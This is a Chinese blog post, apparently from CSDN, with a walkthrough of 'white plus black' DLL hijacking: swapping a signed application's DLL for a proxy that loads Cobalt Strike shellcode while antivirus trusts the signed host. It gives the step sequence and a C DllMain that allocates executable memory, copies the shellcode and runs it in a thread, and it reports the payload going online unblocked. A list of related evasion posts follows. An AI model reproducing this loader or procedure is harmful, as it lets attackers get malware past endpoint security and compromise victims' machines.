DLL劫持-白加黑

原创 已于 2022-05-07 00:59:37 修改 · 3.2k 阅读 · 12 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#安全

于 2022-05-06 22:59:25 首次发布
本文探讨了在有杀毒软件保护的环境下,如何通过修改数字签名应用的DLL来实现DLL劫持,利用白名单策略绕过安全检查,成功上线恶意目标。着重介绍了使用shellcode技术,以及如何编译并替换目标应用DLL的过程。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

0x01 前言

DLL劫持可以用作权限维持,权限提升等作用,下面介绍一下在有杀毒软件的情况下dll劫持通过白加黑的方式获取权限,上线目标。

杀软在检测一个应用是否为病毒的时候,首先会通过黑白名单校验-病毒特征库查询-上传云查杀,在黑白名单校验阶段,如果是白名单中的应用则可以成功运行,白名单也就是有数字签名的应用,我们可以通过修改有数字签名应用中的dll,当该应用启动时会调用该dll,从而上线目标。

0x02 复现

使用cs生成shellcode
在这里插入图片描述

使用管理员权限打开Aheadlib+ 选择要劫持转发的dll,点击生成
在这里插入图片描述
将原始的DLL改名换成sqlite3Org

将生成的.cpp文件的内容复制到创建的dll项目

找到dll入口点

#include <Windows.h>
#include "pch.h"

········(为生成的.cpp文件的内容)


BOOL WINAPI DllMain(HMODULE hModule, DWORD dwReason, PVOID pvReserved)
{
	unsigned char buf[] = "shellcode";
	void *exec = VirtualAlloc(0, sizeof(buf), MEM_COMMIT, PAGE_EXECUTE_READWRITE);//分配内存空间,赋予执行读取权限
	memcpy(exec, buf, sizeof(buf));//将buf的内容拷贝到内存中
	CreateThread(0, 0, (LPTHREAD_START_ROUTINE)exec, 0, 0, 0);//创建线程运行shellcode,将地址转换成可运行的线程函数

	if (dwReason == DLL_PROCESS_ATTACH)
	{
		DisableThreadLibraryCalls(hModule);

		return Load();
	}
	else if (dwReason == DLL_PROCESS_DETACH)
	{
		Free();
	}

	return TRUE;
}

········(为生成的.cpp文件的内容)

编译生成dll文件
在这里插入图片描述

替换目标应用中的dll

运行 未拦截 成功上线
在这里插入图片描述
在这里插入图片描述

c语言劫持dll写法,[原创]DLL劫持生成器 源码开放(纯WINDOWS SDK)+ 实例分析
weixin_35856883的博客
05-21 1765
本菜最近学习了什么DLL注入啊,hook啊(r3)的相关技术,觉得很好玩,于是深入发现还有DLL劫持这种东西觉得挺好玩的,加上最近看到各种木马分析报告中都还有发现有利用白加黑的现象。于是自己想找几个来玩玩,但是一个一个手动测试麻烦啊,于是想写个工具来测试目标是否存在DLL劫持漏洞的可能,于是就产生了写个工具的想法,上网一看,原来十年前都有大神写出来了,不过感觉有点麻烦,好多选项不知道干嘛的,加上本...
免杀对抗-DLL劫持免杀
xiaoheizi的博客
10-04 2217
项目名称右键——打开项目位置——将反编译的dll源码复制进去。根据文件中的教程,选中文件——右键属性——如下图修改——点击应用。使用python执行如下代码,调用dll文件。lib=CDLL('生成的dll文件路径')选中dll源码拖入项目,工具就会自动加载源码。根据教程——继续打开asm文件的属性进行配置。打开asm文件,将所有的jmp语句删除。链接器——调试——生成调试信息——否。——代码生成——运行库——多线程。将生成的dll文件改名位krpt。预编译头——不使用预编译头。
渗透技巧 | 有手就行的白加黑实战免杀
2201_75362610的博客
06-27 3175
最近一直在打攻防,很多时候都需要用到免杀,那么怎么能快速做免杀和权限维持就是一个问题,于是就想起来利用白加黑快速做免杀或权限维持,俗称有手就行,废话不多说直接开干!
DLL函数查看与劫持源码实现——支持64位DLL
最新发布
weixin_30299319的博客
07-05 664
动态链接库(Dynamic Link Library,DLL)是Windows操作系统中实现共享函数库的一种方式,它允许程序共享库中的代码和资源,从而优化内存使用和程序设计。DLL技术的重要性体现在以下几个方面:DLL是一种特殊的可执行文件,它包含可以被多个程序调用的代码、数据或资源。在程序运行时,DLL被加载到内存中,并为各个应用程序提供运行时链接。通过DLL,开发者可以更方便地管理和更新程序模块,因为它们不必重新编译整个应用程序来升级或修改某个特定功能。
DLL劫持生成器.exe
05-21
一键生成DLL文件函数。
【Windows】白加黑DLL劫持
一点一点变好
11-22 362
网上关于如何编写 dll 的资料不全或太过片面在 dlldllmain 函数中执行 shellcode 导致死锁如何在 dll 中截取主线程直接上线通过一翻努力一一解决问题,白加黑终于制作成功,但是发现即便白 exe 有 360 签名也不能过 360 的晶核模式,又通过一番寻找成功 bypass 360 晶核模式,不得不说白加黑除了制作 dll 麻烦,使用起来真是简单高效,适合有一定基础的免杀新手尝试。
免杀对抗—DLL劫持&白加黑&隐写分离&EDR&Syscall-hook
2301_76227305的博客
10-31 2832
对于白加黑呢免杀效果是比较强的,关键是DLL后门的免杀,分离或者混淆都可以实现。至于这个Syscall,我是不会编写,只能玩一下别人的项目,而且这玩意挺难的我说实话,更加偏向于二进制那边的了。最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
白加黑dll劫持
qq_59468567的博客
04-13 1302
DLL全称dynamic-link library,即动态链接库,是一个包含可以由多个程序同时使用的代码和数据的库。比如,windows操作系统中的Comdlg32.dll 包含常见的对话框相关导出函数,当我们在程序中加载该DLL后,就能使用该DLL中的函数来实现“打开”对话框。用大白话解释,每一个DLL都有一些特定的功能,包含该DLL即可使用这些功能。而DLL劫持其实就是在不破坏目标DLL的功能的情况下,增加一些恶意代码,使程序执行恶意代码。
浅谈dll劫持-白加黑免杀指南
2401_84466325的博客
06-17 1499
这就会产生事件无法得到处理,程序卡死的现象。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
易语言-通用型DLL劫持易语言
06-25
通过学习和理解这个通用型DLL劫持的易语言源码,开发者不仅可以掌握DLL劫持的技术,还能深入理解Windows API的工作原理,提升系统级编程能力。同时,这也为逆向工程、安全分析以及软件调试提供了基础工具。然而,...
深入探究Windows平台客户端安全问题-进程地址空间入侵和白加黑高阶利用1
08-08
9. Dll 模块劫持(LPK.dll、ComRes.dll、以及开发者犯错构成的模块劫持) 这些方法都需要 LoadLibrary 函数的介入,因为要把一个模块加载到一个进程空间就涉及到 PE Loader 相关的操作了。 三、Explorer Shell ...
白加黑免杀教程,很优秀的教程
03-06
白加黑免杀教程,很优秀的教程
基于AheadLib工具进行DLL劫持
墨鱼菜鸡
06-24 259
背景 或许你听过DLL劫持技术,获取你还没有尝试过DLL劫持技术。DLL劫持技术的原理是: 由于输入表中只包含DLL名而没有它的路径名,因此加载程序必须在磁盘上搜索DLL文件。首先会尝试从当前程序所在的目录加载DLL,...
白加黑这种攻击方法
Y7472821的博客
10-26 362
为什么我们需要白加黑这种攻击方法呢?答:降本增效,我们知道在以后AI+安全崛起的大背景下,社工将会成为攻防演练项目中,成本最低,效率最高的一种攻击方式,而这个时候"白加黑"的成本优势就体现的淋漓尽致了。那什么是白加黑呢?答:白加黑就是通过DLL劫持在应用程序的导出目录中通过创建一个DLL并通过LoadLibrary函数(或者找一个已有的DLL注入恶意代码)来加载DLL文件。当目标尝试执行该文件(注意:不是执行受恶意的DLL文件)时,这个白文件会在应用程序加载时加载恶意的DLL
网络安全攻防对抗之白加黑技术
u013930899的博客
09-07 1795
白加黑”手法是一种利用DLL劫持技术的攻击方式。它通过在应用程序的导出目录中创建一个DLL文件,并通过LoadLibrary函数(或者找一个已有的DLL注入恶意代码)来加载该DLL文件。当目标尝试执行该应用程序时,该白文件会在应用程序加载时加载恶意的DLL。这样,攻击者就可以访问目标计算机,并且恶意代码可以绕过安全软件的主动防御。通过采取这些措施,可以有效地防止“白加黑”攻击。同时,用户应该时刻保持警惕,不要轻易打开来自不可信来源的文件或链接,以及注意保护个人信息和密码等敏感信息。
白加黑样本分析
weixin_51409218的博客
08-20 991
白加黑样本分析
病毒木马查杀实战第026篇:“白加黑”恶意程序研究(上)
weixin_30539625的博客
08-10 478
前言 众所周知,传统的恶意程序都是由单一文件构成的。从而实现某一种或者几种恶意功能。而这类的恶意程序为了避免被发现以及被查杀,往往会採用五花八门的自我隐藏技术以及免杀技术,病毒程序的作者非常多时候也是脑洞大开。为了对抗杀软的查杀也是无所不用其极。我们每天所处理的恶意文件中面。反查杀手段运用得最好的就是脚本木马,关于这类程序。我在之前的《病毒木马查杀实战第025篇:JS下载者脚本木马...
免杀技术之白加黑的攻击防御
蛇矛实验室
04-24 2483
黑就是指我们自己的文件,没有有效证书签名,也不是微软文件。手动检测的方式也很简单,我们只需要多注意这种exe只带有一个dll的文件,因为如果是木马的话他一般不会有很多文件,我们可以dll右键属性看看是否有签名,如果没有就很可疑,如果有的话看看签名是否有效,这里也可以用代码去代替这个过程。此时看到这个图,不要认为我们又要换白程序了,报错是成功的一大步,到这里就说明我们已经成功百分之90了,这里的问题是我们dll虽然有了但是程序加载我们的dll后调用的函数我们并没有提供,好的我们用dumpbin来看下。
道路施工组织设计方案白加黑方法解析
资源摘要信息:"参考资料-白加黑道路施工组织设计方案.zip" 在深入分析参考资料-白加黑道路施工组织设计方案之前,我们需要了解几个核心概念和知识点。首先是白加黑技术,这是一种道路施工方法,指的是将原有的黑色...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值